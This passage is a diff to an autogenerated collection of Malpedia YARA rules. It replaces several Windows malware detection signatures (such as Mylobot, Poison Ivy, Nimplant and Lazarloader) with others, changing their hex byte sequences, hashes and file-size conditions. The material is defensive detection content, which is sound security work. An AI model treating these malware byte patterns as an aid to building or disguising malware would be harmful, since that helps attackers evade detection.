+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkcloud_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "26e9369b12553b0bff21d81ce8a2563735cb73daf51c3e0b22c3fdadcf7df76a"
-		score = 60
-		quality = 25
+		logic_hash = "aa0d92530fd9200448b5bea8151df68481eaae78d40aef44b3313e13499f3f86"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84494,38 +84507,32 @@ rule MALPEDIA_Win_Hookinjex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? b80a020000 eb02 33c0 }
-		$sequence_1 = { e8???????? 85c0 750f b9ab480100 }
-		$sequence_2 = { e8???????? b95b730100 e8???????? e9???????? }
-		$sequence_3 = { e8???????? 833d????????00 7411 b903000000 e8???????? 488905???????? }
-		$sequence_4 = { e8???????? 85c0 740f b907b60000 }
-		$sequence_5 = { e8???????? b964000000 ff15???????? 0fb705???????? }
-		$sequence_6 = { e8???????? 833d????????00 7411 b906000000 e8???????? 488905???????? }
-		$sequence_7 = { e8???????? 85c0 740c b913e40000 }
-		$sequence_8 = { 4883780800 7512 488b442450 8b00 }
-		$sequence_9 = { 0f843d010000 488b442440 488b4c2470 488b4920 }
-		$sequence_10 = { 25ff9fffff 89442420 8b442420 89442448 }
-		$sequence_11 = { 03442460 488b4c2468 8901 e9???????? 488b542470 488d4c2430 }
-		$sequence_12 = { 25ffe7ffff 0fbae80b 8944243c 8b44243c }
-		$sequence_13 = { 25ffe7ffff 0fbae80b 89442420 8b442420 89442468 }
-		$sequence_14 = { 25ff0f0000 89442448 488b0d???????? 48894c2450 }
-		$sequence_15 = { 25ffe7ffff 0fbae80b 8944245c 8b44245c }
+		$sequence_0 = { 6a00 68???????? 8d857cffffff 50 ff15???????? 8d8d7cffffff 51 }
+		$sequence_1 = { 8b9584feffff 52 8b8580feffff 50 ff15???????? 898568fdffff eb0a }
+		$sequence_2 = { 89952cffffff 6aff 8b45a8 50 8b4d08 8b11 52 }
+		$sequence_3 = { c7458c0a000000 c745a404000280 c7459c0a000000 c745b404000280 c745ac0a000000 8b45d8 }
+		$sequence_4 = { 83c418 c745fc11000000 ba???????? 8d4da0 ff15???????? 8d45a0 50 }
+		$sequence_5 = { 51 8d8544ffffff 52 50 ff15???????? }
+		$sequence_6 = { 8bd0 8d4d98 ff15???????? ba???????? 8d4dac ff15???????? 8b5598 }
+		$sequence_7 = { ff15???????? 8d4dc8 ff15???????? 8d4db8 ff15???????? c745fc0c000000 8b45d4 }
+		$sequence_8 = { 68???????? ff15???????? 8bd0 8d4da8 ff15???????? 8d4590 50 }
+		$sequence_9 = { 8d4d88 51 8d558c 52 8d4590 50 6a05 }
 
 	condition:
-		7 of them and filesize < 6545408
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Mylobot_Auto : FILE
+rule MALPEDIA_Win_Slimagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f7dde5ee-bede-5ac3-b3eb-6e299ffacf3b"
+		id = "81a11c11-c6ba-51d7-a103-aa43fd5efed5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mylobot_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slimagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slimagent_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "56cc02e4b48743c53b559e650312c78d0538beee90fc9e32cc4b9fd49244eca7"
+		logic_hash = "78304dd9a4e758407499c150f8ded9d2c3d715e90c8046900ee52970af3e3c9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84539,38 +84546,32 @@ rule MALPEDIA_Win_Mylobot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f6 5e c3 8b442404 eb05 40 84c9 }
-		$sequence_1 = { 6a00 6a00 8d8c24c4000000 51 }
-		$sequence_2 = { 8b54241c 891481 ff430c 8b4ff0 85c9 7502 }
-		$sequence_3 = { 8bf0 6aff 56 ff15???????? 56 ff15???????? 6810270000 }
-		$sequence_4 = { 5d 5e 5b 81c404080000 c3 8b4c2404 8b54240c }
-		$sequence_5 = { 42 84c9 75f6 5e c3 }
-		$sequence_6 = { ff96a8000000 50 ff5670 a1???????? 57 ff742410 ff742414 }
-		$sequence_7 = { 8b54240c 56 8b74240c 57 8bf9 2bf1 8bc2 }
-		$sequence_8 = { ff15???????? 85c0 0f8447010000 8b742438 85f6 0f843b010000 8b3d???????? }
-		$sequence_9 = { 51 8d8ddcfdffff e8???????? 83c404 85c0 }
-		$sequence_10 = { c3 ff15???????? 8b45f0 50 ff15???????? }
-		$sequence_11 = { b8???????? e8???????? 83c40c 85c0 0f84d9010000 }
-		$sequence_12 = { 8d4dfc 51 52 ffd0 8b45fc }
-		$sequence_13 = { 6a09 50 ffd2 8bf8 }
-		$sequence_14 = { 7416 8bff 0fb6d0 8a9c15dcfdffff 84db }
-		$sequence_15 = { 85c0 0f84c3000000 8b08 8d55f8 52 68???????? }
+		$sequence_0 = { 488bc2 488d0df5440200 0f57c0 48890b 488d5308 488d4808 0f1102 }
+		$sequence_1 = { b801000000 874110 85c0 7427 8364244000 488d05d2a5feff 4889442448 }
+		$sequence_2 = { c3 4053 4883ec20 488d054bcf0200 488bd9 488901 f6c201 }
+		$sequence_3 = { 0f1102 e8???????? 488d058c780200 488903 488bc3 4883c420 5b }
+		$sequence_4 = { 66413b444b02 7515 4883c102 4883f90b 7415 0fb7044a 66413b044b }
+		$sequence_5 = { 488d0c4f 41b810000000 488d15004c0400 e8???????? 6646892c77 eb7d 48c744242008000000 }
+		$sequence_6 = { 4c8b83f0000000 498bc0 482bc1 483bd0 772f 488d3411 }
+		$sequence_7 = { 488bc2 48c1e83f 4803d0 4863c2 4869c880aefeff 488d0535240100 89531c }
+		$sequence_8 = { 4803fa 4d8bc6 33d2 488bcf e8???????? 42c6043700 eb0f }
+		$sequence_9 = { 48899fc8000000 668919 488d8fd8000000 4883bff000000008 7207 }
 
 	condition:
-		7 of them and filesize < 8028160
+		7 of them and filesize < 769024
 }
-rule MALPEDIA_Win_Lazarloader_Auto : FILE
+rule MALPEDIA_Win_Quickheal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4eef2499-48c5-5b94-8dd0-29267a0265f8"
+		id = "32c5b738-c920-5a30-a6ba-c9a05fe50d12"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lazarloader_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quickheal_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "176d7f7f65178334e7677ff59a660edd6b016ed103feffa239e5ccc53e031e90"
+		logic_hash = "b1666ee1e28f71dc83ee325a607900259e0027addcd09d0a51064c380d4fc4c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84584,32 +84585,32 @@ rule MALPEDIA_Win_Lazarloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48894de8 488945f0 488d15a0bd0000 b805000000 894520 894528 }
-		$sequence_1 = { 488bd7 4c8d05fecd0000 83e23f 488bcf }
-		$sequence_2 = { 33c0 b906020000 f3aa 33c0 66898424d0060000 488d8424d2060000 488bf8 }
-		$sequence_3 = { 488bc2 e9???????? 493bec 0f84be000000 8b7500 33c0 f04d0fb1bcf120ba0100 }
-		$sequence_4 = { 4889842490000000 488b442470 0fb700 6689442432 488b442458 0fb74c2432 }
-		$sequence_5 = { 4885c9 7430 53 4883ec20 488d0563810000 }
-		$sequence_6 = { eb19 488d1dec1e0100 eb10 488d1df31e0100 eb07 488d1dd21e0100 }
-		$sequence_7 = { 4883ec20 e8???????? 488b05???????? 488d1da7710100 }
-		$sequence_8 = { e8???????? 89442460 33c9 e8???????? }
-		$sequence_9 = { 85c0 750d 488bcb e8???????? e9???????? 4c8d2557230100 }
+		$sequence_0 = { 33c0 8d7c2431 c78424ec0300001c010000 f3ab 66ab }
+		$sequence_1 = { 66898c2494040000 b940000000 f3ab c784249800000003000000 c78424cc000000058288a2 }
+		$sequence_2 = { 8b542414 6a07 52 895c2478 895c247c }
+		$sequence_3 = { 8944242c 55 e9???????? ffd6 68???????? 57 8944243c }
+		$sequence_4 = { 89542450 f7d1 89542454 49 8bf9 8d043f 50 }
+		$sequence_5 = { 7527 85ed 7523 8b4c2414 e8???????? 53 892d???????? }
+		$sequence_6 = { 8d5c2410 83c404 8944240c c1eb04 8d740704 e8???????? 3206 }
+		$sequence_7 = { ffd7 3bc3 0f845d040000 8d8c24d8150000 2bc6 }
+		$sequence_8 = { 23e9 f7d2 23d6 0bd5 8b6c243c 03d5 03da }
+		$sequence_9 = { 8b542420 c1f802 8d0440 3bd0 0f8c8e030000 8d46fc 53 }
 
 	condition:
-		7 of them and filesize < 364544
+		7 of them and filesize < 553984
 }
-rule MALPEDIA_Win_Gameover_P2P_Auto : FILE
+rule MALPEDIA_Win_Poison_Ivy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fe20a97c-206c-5c98-87a9-4b574fa239f7"
+		id = "0917932a-f079-5bf1-931c-716d03c726be"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gameover_p2p_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poison_ivy_auto.yar#L1-L94"
 		license_url = "N/A"
-		logic_hash = "0a805dc64b5619969bf73a86439d36461e7cd7fd50eef8d82014a2fb996a9dce"
+		logic_hash = "3536834c24827a74ee9df7192a4db2e3644f1cf45a57755c4feba403f8b5bbbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84623,32 +84624,29 @@ rule MALPEDIA_Win_Gameover_P2P_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88442413 0fb6c0 8944241c 8a80007f3902 0fb6c0 3bc8 }
-		$sequence_1 = { 8d55ee 33c9 e8???????? ba???????? 6a2e 58 668945ec }
-		$sequence_2 = { 33c0 e9???????? 6a74 59 e8???????? 8bf8 85ff }
-		$sequence_3 = { 8b8684000000 8d0440 03c0 0fb78c008a183902 03c0 898e80000000 0fb79088183902 }
-		$sequence_4 = { 895108 6bd20c 83c104 e8???????? c20400 f644240401 }
-		$sequence_5 = { 3d02010000 0f85e0000000 8d7dce 6800020000 8d44241c 50 8d8424b0060000 }
-		$sequence_6 = { e8???????? 33d2 b9ff000000 f7f1 6a00 56 8bcf }
-		$sequence_7 = { ff15???????? 8bf0 89742410 83feff 7478 8d442414 50 }
-		$sequence_8 = { 8a0408 3204f598613902 32c2 42 880439 663b14f59a613902 }
-		$sequence_9 = { 50 8d442448 85ed 8b6c2444 0f45c8 51 ff742430 }
+		$sequence_0 = { 6a01 6a00 8d86120e0000 50 }
+		$sequence_1 = { 683f000f00 6a00 57 51 ff5635 68ff000000 }
+		$sequence_2 = { 51 57 ff9681000000 8d45fc 50 683f000f00 6a00 }
+		$sequence_3 = { 80beaf08000001 7507 b902000080 eb05 b901000080 8d45fc 50 }
+		$sequence_4 = { 8d86120e0000 50 ff75fc ff563d }
+		$sequence_5 = { 51 ff5635 68ff000000 8d86b1060000 50 6a01 6a00 }
+		$sequence_6 = { 57 ff9681000000 80beaf08000001 7507 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Webc2_Head_Auto : FILE
+rule MALPEDIA_Win_Mpkbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2d2a730d-97a8-5241-8842-4f785d02a551"
+		id = "5c0d844d-8443-5cd2-85d1-0760b4dc7471"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_head_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mpkbot_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "de901b0b98bf3f5b5c73a555d4c5ec984c92ea5b4ae983fcd4805edfd4129476"
+		logic_hash = "e000d2e2dca508ff7c1606218ef334f987cad7bd6633af2fef3bc1fd70b54752"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84662,32 +84660,32 @@ rule MALPEDIA_Win_Webc2_Head_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a4 8d049500000000 8d0c52 89442418 894c2438 8b44241c 8b00 }
-		$sequence_1 = { 735a 8bc8 83e01f c1f905 8b0c8d40cb4000 }
-		$sequence_2 = { 0f8550ffffff 8b542424 8b4c241c 3bd1 0f8dc9000000 2bca }
-		$sequence_3 = { 83c40c f2ae f7d1 49 894c2414 7511 bf???????? }
-		$sequence_4 = { 0fb6fa 3bc7 7714 8b55fc 8a9220994000 }
-		$sequence_5 = { f2ae f7d1 49 51 68???????? 50 50 }
-		$sequence_6 = { 8d9e38994000 803b00 8bcb 742c }
-		$sequence_7 = { f7d1 49 68???????? 68???????? 894c2438 e8???????? }
-		$sequence_8 = { f3ab 68???????? e8???????? 6a03 68???????? 68???????? }
-		$sequence_9 = { 8b6c2424 884603 83c604 89742410 8bde }
+		$sequence_0 = { 50 ff15???????? ff7510 a3???????? }
+		$sequence_1 = { 68???????? 68???????? 8975f8 8b08 50 }
+		$sequence_2 = { 52 56 6a20 68???????? 68???????? 8975f8 8b08 }
+		$sequence_3 = { 50 ff15???????? 8b45fc 3bc6 7406 8b08 }
+		$sequence_4 = { 68???????? 68???????? 8975f8 8b08 50 ff5150 }
+		$sequence_5 = { a5 a5 8b75fc 5f 53 ff15???????? 8bc6 }
+		$sequence_6 = { 56 68???????? 68???????? ffd7 6a00 6a01 }
+		$sequence_7 = { eb15 53 ff75f8 56 }
+		$sequence_8 = { d95dd0 d945d0 d9c1 dee1 d95dcc 0fb630 }
+		$sequence_9 = { 6a01 6aff 8975fc 8b08 50 ff5110 85c0 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Glasses_Auto : FILE
+rule MALPEDIA_Win_Nimplant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e3f60807-9e3f-553f-aab3-2b9d174a2d1f"
+		id = "a344304a-2438-58e4-b960-8890c3f03181"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glasses_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimplant_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "f8dc4024fd9ceffd71dbd3d9fead59d2a70f550a13ec78ce30cdcf445ee6a1a3"
+		logic_hash = "3bcc7f38e2b9ac77c0e1b998e8b9b2d2ae5abbf7ef3c4a3072bece45de56739e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84701,32 +84699,32 @@ rule MALPEDIA_Win_Glasses_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b4d10 51 68???????? 8bce e8???????? 8d4de4 }
-		$sequence_1 = { e9???????? 8d8d38fdffff e9???????? 8d8d94feffff e9???????? 8d8dacfdffff e9???????? }
-		$sequence_2 = { ffd0 e9???????? 389d4afbffff 0f842f070000 8d8d10fbffff 889d4bfbffff e8???????? }
-		$sequence_3 = { eb05 1bc9 83d9ff 85c9 0f84643d0000 b9???????? 8d9b00000000 }
-		$sequence_4 = { eb2d 8b5520 8b451c 8d8e00090000 51 8b4d18 52 }
-		$sequence_5 = { e8???????? 8ac3 e9???????? 68???????? e9???????? 8b16 8b4214 }
-		$sequence_6 = { f3ab 8b5510 52 e8???????? 83c404 5f 5e }
-		$sequence_7 = { e9???????? 8d8df4feffff e9???????? 8d8d08ffffff e9???????? 8b542408 8d420c }
-		$sequence_8 = { e8???????? 8d8d40fdffff 51 bb05000000 56 8d4d94 885dfc }
-		$sequence_9 = { ff15???????? 399d60fcffff 8b854cfcffff 7306 8d854cfcffff 50 e8???????? }
+		$sequence_0 = { 4c8d05a49c0400 e8???????? 4885db 740f 48b80000000000000040 488503 }
+		$sequence_1 = { 4d85e4 0f8886000000 410fb6443c08 89c2 83e2fd 80fa3c 7404 }
+		$sequence_2 = { 4d29dd 4801fe 488d4802 4839d1 7c16 4801d2 4883c003 }
+		$sequence_3 = { 744a 488d4c2430 4c89ea e8???????? 488b7c2430 0fb62b 4c89e9 }
+		$sequence_4 = { 4c8b11 4c8b5908 488b02 4c89c3 4c8b4208 4c8d6c2430 4989d4 }
+		$sequence_5 = { 498b4708 420fb6440807 3c5c 744d 3c2f 7449 ba01000000 }
+		$sequence_6 = { 4c89fa 4c89c9 4c894c2438 e8???????? 0fb63b 4c8b7c2458 4c8b4c2438 }
+		$sequence_7 = { 48897c2438 0f8093030000 4885c0 0f88c2050000 488d7c2470 4889c2 488dac2480000000 }
+		$sequence_8 = { 4c894c2448 4c895c2440 e8???????? 4c8b5c2440 4c8b4c2448 4d01d9 0f8050020000 }
+		$sequence_9 = { e8???????? 0fb62b 4084ed 0f85d6fdffff 89f0 488d9424f0000000 c744242001000000 }
 
 	condition:
-		7 of them and filesize < 4177920
+		7 of them and filesize < 1811456
 }
-rule MALPEDIA_Win_Doubleback_Auto : FILE
+rule MALPEDIA_Win_October_Seventh_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "035a9a1e-c37c-5062-9628-749c129d60a8"
+		id = "c923fdd4-c954-5dde-bdcd-f3b77326ae47"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doubleback_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.october_seventh"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.october_seventh_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "3ec9aa1fddb06b8b6c176677c7cb9e9e3472c33e097d5e85291d462774406acd"
+		logic_hash = "552e719a27839e5d3f04d1c3619c82bb79d38c4fb51bdf6c68df34e2e7210a4c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84740,32 +84738,32 @@ rule MALPEDIA_Win_Doubleback_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b947060000 eb49 b9e7050000 eb42 b9e3050000 eb3b }
-		$sequence_1 = { b947060000 eb49 b9e7050000 eb42 }
-		$sequence_2 = { 3d00280000 7438 3d5a290000 742a 3d39380000 741c 3dd73a0000 }
-		$sequence_3 = { b9d4070000 eb13 b975070000 eb0c b96f070000 eb05 }
-		$sequence_4 = { e8???????? 85c0 7508 c60703 }
-		$sequence_5 = { b9e3050000 eb3b b90b070000 eb34 2d63450000 7428 }
-		$sequence_6 = { eb49 b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 }
-		$sequence_7 = { b975070000 eb0c b96f070000 eb05 }
-		$sequence_8 = { b9d4070000 eb13 b975070000 eb0c b96f070000 }
-		$sequence_9 = { 751a b9d4070000 eb13 b975070000 }
+		$sequence_0 = { 81784870034200 7409 ff7048 e8???????? 59 8b45fc }
+		$sequence_1 = { 80ba????????3f 76f3 2bcf 49 8d4103 99 }
+		$sequence_2 = { 50 8b8598f8ffff 0fb7048544cb4100 8d048540c24100 }
+		$sequence_3 = { ff35???????? 89442410 e8???????? 8bf0 83c408 }
+		$sequence_4 = { 8b0cbdd08fd500 c644112900 837dfc00 7507 b800800000 eb1e 84db }
+		$sequence_5 = { 8b45d4 0345b4 48 e9???????? 8b0c85d08fd500 }
+		$sequence_6 = { 33c0 5b 8be5 5d c3 8b4018 33f6 }
+		$sequence_7 = { 68???????? a3???????? ffd0 ba???????? b9???????? 8bf0 }
+		$sequence_8 = { 7470 eb17 be???????? 68???????? e8???????? 83c404 }
+		$sequence_9 = { 46 3b75f0 72c5 eb0f 8b45f4 8b7dfc 0fb70470 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 19859456
 }
-rule MALPEDIA_Win_Xfsadm_Auto : FILE
+rule MALPEDIA_Win_Quickmute_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4e0da958-d7db-5cd3-9845-58c1ee1ba55b"
+		id = "82702de0-3ec3-5174-97b3-ecd07741028d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xfsadm_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quickmute_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "b8085f6961208dfb9003a24568de62da647e6cb5e982bfeaf61525cbc63ec421"
+		logic_hash = "a1fe14ff6e270ce43f084b7c17d9cfec20868bf0fcb227ce38e0547341f7d58e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84779,32 +84777,32 @@ rule MALPEDIA_Win_Xfsadm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740f 83f8fe 740a 6bce38 030c95f8d84200 f6412d01 7414 }
-		$sequence_1 = { 8d7301 80fa78 7577 385903 }
-		$sequence_2 = { 895e04 eb03 8b5e04 893c83 ff4634 }
-		$sequence_3 = { 83c404 8b5d0c c7461000000000 c7461400000000 c7461800000000 8d4b01 8a03 }
-		$sequence_4 = { 6a03 6808020000 ff15???????? 68???????? ff75e0 ff75dc }
-		$sequence_5 = { 8b12 8b42f8 2b4afc 2bc7 0bc8 }
-		$sequence_6 = { 894df0 83c104 50 e8???????? 8bf8 85ff 0f84cb000000 }
-		$sequence_7 = { a3???????? 85c0 0f8475010000 68???????? ff35???????? ffd6 a3???????? }
-		$sequence_8 = { 8b7b20 8b7324 6a00 ff10 8b06 8bce 53 }
-		$sequence_9 = { f20f593c85604f4200 660f122c85604f4200 03c0 660f28348570534200 }
+		$sequence_0 = { c78550ffffff7265616c c78554ffffff6c6f6300 391d???????? 750f 8d8550ffffff 50 }
+		$sequence_1 = { 6a00 52 ff15???????? 83c40c 6a10 8d45ec 6a00 }
+		$sequence_2 = { 8b75fc 85f6 740c 56 }
+		$sequence_3 = { 0f8410020000 837dec00 755e 837df000 7558 837df400 }
+		$sequence_4 = { ffd7 a3???????? 833d????????00 c68560ffffff47 889d61ffffff c78562ffffff74537461 c78566ffffff72747570 }
+		$sequence_5 = { 8b7508 c7465ca89b4000 83660800 33ff 47 897e14 }
+		$sequence_6 = { 8d45b4 50 56 ffd7 a3???????? 833d????????00 }
+		$sequence_7 = { 8d7c2410 e8???????? 803d????????00 756b }
+		$sequence_8 = { 66c7855affffff656e 889d5cffffff c7855dffffff69616c73 c68561ffffff00 750f 8d954cffffff 52 }
+		$sequence_9 = { 6a0d 58 5d c3 8b04cd74c14000 5d c3 }
 
 	condition:
-		7 of them and filesize < 566272
+		7 of them and filesize < 146432
 }
-rule MALPEDIA_Win_Fk_Undead_Auto : FILE
+rule MALPEDIA_Win_Ldr4_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf4f13f3-5cfd-52f4-9402-53feb1040423"
+		id = "c588634c-3a69-5c4e-b524-6b66db1c4a89"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fk_undead"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fk_undead_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ldr4_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "082cbaea4a68893ab74100ece6602c4f221f464c059db4c166d2438647300475"
+		logic_hash = "e747da5dcad3015b47810444cb7613ce4b06e63b04ebbc6ff8767e44ad66440e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84818,32 +84816,32 @@ rule MALPEDIA_Win_Fk_Undead_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80bbbb02000000 0f44f9 83f807 0f87cb020000 ff2485887a0310 ff4618 }
-		$sequence_1 = { 8965f0 8b4508 8b750c 8b5510 33c9 898dd8f7ffff 894dfc }
-		$sequence_2 = { 83bb2402000000 745a 6a0a ff37 68???????? e8???????? 83c40c }
-		$sequence_3 = { 8bf0 6a02 6a02 56 ff15???????? c745fc00000000 56 }
-		$sequence_4 = { 6a3a ff37 e8???????? 8bf0 83c408 85f6 0f84b7000000 }
-		$sequence_5 = { 742d 8b94241c080000 8b442408 8b8c2420080000 8902 8b1424 8b842424080000 }
-		$sequence_6 = { 8b4c241c 52 8908 e8???????? 8b442418 83c404 5e }
-		$sequence_7 = { 0fb7780c 8b442428 8d5001 8a08 40 84c9 75f9 }
-		$sequence_8 = { 8b6c2414 33c0 33d2 57 89442408 85ed 0f8402010000 }
-		$sequence_9 = { 51 e8???????? 83c404 8903 85c0 7516 8b5500 }
+		$sequence_0 = { 56 8d45b4 50 53 33f6 56 }
+		$sequence_1 = { 8b4008 8945f4 a1???????? 53 35fc28b0ec 56 50 }
+		$sequence_2 = { c745f40c000000 c745fc01000000 895df8 ffd7 85c0 7508 }
+		$sequence_3 = { 53 56 57 8bf8 a1???????? 8b5808 8b07 }
+		$sequence_4 = { a1???????? 8b4008 89442404 85f6 0f84c9000000 8b4610 85c0 }
+		$sequence_5 = { 8b4008 57 8b3d???????? 6a40 8945f8 8d45b8 }
+		$sequence_6 = { ff15???????? 8bf0 85f6 750c 57 ff15???????? 6a08 }
+		$sequence_7 = { 3bc6 743c 56 56 ff75f4 }
+		$sequence_8 = { ff15???????? 8d4608 50 e8???????? 837e0400 7414 6aff }
+		$sequence_9 = { 35fc28b0ec 56 50 8b4508 8b402c e8???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 1418240
+		7 of them and filesize < 117760
 }
-rule MALPEDIA_Win_Blind_Edr_Auto : FILE
+rule MALPEDIA_Win_Cotx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "763f7b33-d005-5632-bc6e-32cbbb43afd8"
+		id = "7eae7fd5-fe09-5035-acc7-8021961f04a4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blind_edr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blind_edr_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cotx_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "af78d8eedd7874fd051e4e2d0675f6cbdce3ecade2c26f196e0f08521ce6dfb2"
